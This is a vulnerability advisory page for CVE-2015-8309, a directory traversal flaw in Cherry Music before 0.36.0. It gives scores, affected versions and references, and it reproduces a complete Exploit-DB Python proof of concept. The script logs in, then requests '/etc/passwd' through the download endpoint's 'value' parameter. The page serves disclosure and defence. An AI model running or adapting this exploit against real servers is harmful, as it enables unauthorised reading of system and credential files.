CVE-2015-8309
medium
CVSS v3
4.3
CVSS v4 NEW
โ
VIR risk
5.3
Description
Directory traversal vulnerability in Cherry Music before 0.36.0 allows remote authenticated users to read arbitrary files via the "value" parameter to "download."
Predictions
Exploit likelihood
53%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Cherry Music 0.35.1 - Arbitrary File Disclosure
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
# Date: 11-09-2016
# Exploit Author: feedersec
# Contact: feedersec@gmail.com
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
# Version: 0.35.1
# Tested on: ubuntu 14.04 LTS
# CVE : CVE-2015-8309
import urllib2, cookielib, urllib
#set parameters here
username = 'admin'
password = 'Password01'
baseUrl = 'http://localhost:8080/'
targetFile = '/etc/passwd'
downloadFileName = 'result.zip'
####
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
req = urllib2.Request(baseUrl, params)
response = opener.open(req)
for c in cj:
if c.name == "session_id":
session_id = c.value
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
request = urllib2.Request(baseUrl + "download", params)
response = opener.open(request).read()
with open(downloadFileName, 'wb') as zipFile:
zipFile.write(response)Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| PyPI | cherrymusic | <0.36.0 | 0.36.0 |
| PyPI | cherrymusic | <62dec34a1ea0741400dd6b6c660d303dcd651e86||<0.36.0 | 62dec34a1ea0741400dd6b6c660d303dcd651e86 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| fomori | cherrymusic | {"endIncluding":"0.35.2"} | |
References
- http://www.fomori.org/cherrymusic/Changes.html
- http://www.securityfocus.com/bid/97149
- https://github.com/devsnd/cherrymusic/commit/62dec34a1ea0741400dd6b6c660d303dcd651e86
- https://github.com/devsnd/cherrymusic/issues/598
- https://www.exploit-db.com/exploits/40361/
- https://nvd.nist.gov/vuln/detail/CVE-2015-8309
- https://github.com/devsnd/cherrymusic
- https://github.com/pypa/advisory-database/tree/main/vulns/cherrymusic/PYSEC-2017-99.yaml
- https://web.archive.org/web/20200227183321/http://www.securityfocus.com/bid/97149
- https://www.exploit-db.com/exploits/40361
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.